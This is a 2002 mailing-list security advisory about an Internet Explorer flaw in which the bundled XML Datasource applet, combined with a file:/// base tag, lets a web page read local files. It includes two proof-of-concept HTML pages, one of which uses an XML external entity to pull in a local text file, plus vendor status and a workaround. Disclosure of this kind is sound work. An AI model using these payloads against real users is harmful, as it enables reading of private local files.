[NT] Internet Explorer Can Read Local Files (XML Datasource)

From: support@securiteam.com
Date: 08/19/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Mon, 19 Aug 2002 15:09:13 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Internet Explorer Can Read Local Files (XML Datasource)
------------------------------------------------------------------------

SUMMARY

There is a bug in Internet Explorer that allows reading and sending of
local files. The problem lies in a legacy XML Datasource applet shipped
with Internet Explorer since its 4.0 release.

DETAILS

it is used in a page like this

< applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0"
id="xmldso" MAYSCRIPT="true">
< /applet>

If you add a < base href="file:///C:/"> tag to the head section, the
applet will thinks it is codebase is local and allowing you to read local
XML files. Therefore, this snippet will read c:\jelmer.xml

<html>
<head>
 < base href="file:///C:/">
</head>
<body>
 < applet code="com.ms.xml.dso.XMLDSO.class" width=100% height=50
id="xmldso" MAYSCRIPT="true">
  <PARAM NAME="url" VALUE="jelmer.xml">
 </applet>
 < scr!pt language="javascript">
  setTimeout("showIt()",2000);
  function showIt() {
   var jelmer = xmldso.getDocument();
   alert(jelmer.Text);
  }
 </script>
</body>
</html>

(NOTE, the letter I has been replaced with an !)

Even though reading local XML files is bad enough, more can be done. XML
has a feature called external entities that allows you to combine multiple
files as one big file. This allows us to read text files as well, as shown
by the following example:

<html>
<head>
 < base href="file:///C:/">
</head>
<body>
 < applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0"
id="xmldso" MAYSCRIPT="true">
  <?xml version="1.0"?>
  <!DOCTYPE file [
    <!ELEMENT file (#PCDATA) >
    <!ENTITY contents SYSTEM "file:///C:/jelmer.txt">
  ]>
  <file>
  &contents;
  </file>
 </applet>
 < scr!pt language="javascript">
  setTimeout("showIt()",2000);
  function showIt() {
   var jelmer = xmldso.getDocument();
   alert(jelmer.Text);
  }
 </script>
</body>
</html>

(NOTE, the letter I has been replaced with an !)

Demonstration:
A Demonstration of the issue described is available at:
<http://www.xs4all.nl/~jkuperus/msieread.htm>
http://www.xs4all.nl/~jkuperus/msieread.htm (NOTE, this demonstration will
try to read and display the contents of c:\jelmer.txt)

Vendor status:
Microsoft was notified on 17 August, Jelmer have yet to receive a reply.

Workaround:
Disable java all together or install the Sun JDK, since it does not seem
to be affected: <http://www.webdeveloper.com/html/html_xml_3.html>
http://www.webdeveloper.com/html/html_xml_3.html

ADDITIONAL INFORMATION

The information has been provided by <mailto:jelmer@kuperus.xs4all.nl>
Jelmer.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.